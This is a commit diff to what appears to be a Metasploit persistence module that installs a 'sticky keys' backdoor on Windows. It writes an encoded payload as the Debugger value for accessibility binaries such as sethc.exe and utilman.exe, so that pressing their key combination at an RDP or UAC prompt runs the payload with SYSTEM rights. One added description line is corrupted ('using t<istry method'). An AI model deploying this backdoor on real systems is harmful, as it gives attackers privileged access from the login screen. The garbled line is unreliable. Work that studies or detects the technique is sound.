fix: sticky_keys persistence with new mixin and cleanup rc file

dledda-r7 · dledda-r7 · commit fe05ccaaad80 · 2025-02-28T05:28:33.000-05:00
diff --git a/modules/exploits/windows/persistence/sticky_keys.rb b/modules/exploits/windows/persistence/sticky_keys.rb
@@ -38,16 +38,11 @@ def initialize(info = {})
 
           Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
           to the target prior to running the module. By default, a SYSTEM command prompt is installed
-          using the registry method if this module is run without modifying any parameters.
+          using t<istry method if this module is run without modifying any parameters.
         },
         'Author' => ['OJ Reeves'],
         'Platform' => [ 'win' ],
         'SessionTypes' => ['meterpreter', 'shell'],
-        'Actions' => [
-          ['ADD', { 'Description' => 'Add the backdoor to the target.' }],
-          ['REMOVE', { 'Description' => 'Remove the backdoor from the target.' }]
-        ],
-        'DefaultAction' => 'ADD',
         # these are lies, but for compatibility
         'Arch' => ARCH_CMD,
         'Targets' => [ [ 'Automatic', {} ] ],
@@ -69,9 +64,7 @@ def initialize(info = {})
 
     register_options([
       # XXX add magnify.exe, narrator, atbroker? All listed in mitre attack
-      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
-      # XXX this should be upgraded to drop a payload of our choosing instead
-      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])
+      OptEnum.new('BIN_TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
     ])
 
     deregister_options('WritableDir')
@@ -81,7 +74,7 @@ def initialize(info = {})
   # Returns the name of the executable to modify the debugger settings of.
   #
   def get_target_exe_name
-    case datastore['TARGET']
+    case datastore['BIN_TARGET']
     when 'UTILMAN'
       'Utilman.exe'
     when 'OSK'
@@ -97,7 +90,7 @@ def get_target_exe_name
   # Returns the key combinations required to invoke the exploit once installed.
   #
   def get_target_key_combo
-    case datastore['TARGET']
+    case datastore['BIN_TARGET']
     when 'UTILMAN'
       'WINDOWS+U'
     when 'OSK'
@@ -126,25 +119,20 @@ def check
   #
   # Runs the exploit.
   #
-  def run
+  def install_persistence
     unless is_admin?
       fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
     end
 
     print_good('Session has administrative rights, proceeding.')
 
     target_key = get_target_exe_reg_key
+    command = payload.encoded
 
-    if action.name == 'ADD'
-      command = expand_path(datastore['EXE'])
-
-      registry_createkey(target_key)
-      registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')
+    registry_createkey(target_key)
+    registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')
 
-      print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
-    else
-      registry_deletekey(target_key)
-      print_good("'Sticky keys' removed from registry key #{target_key}.")
-    end
+    print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
+    @clean_up_rc << "reg deletekey -k '#{target_key}'\n"
   end
 end
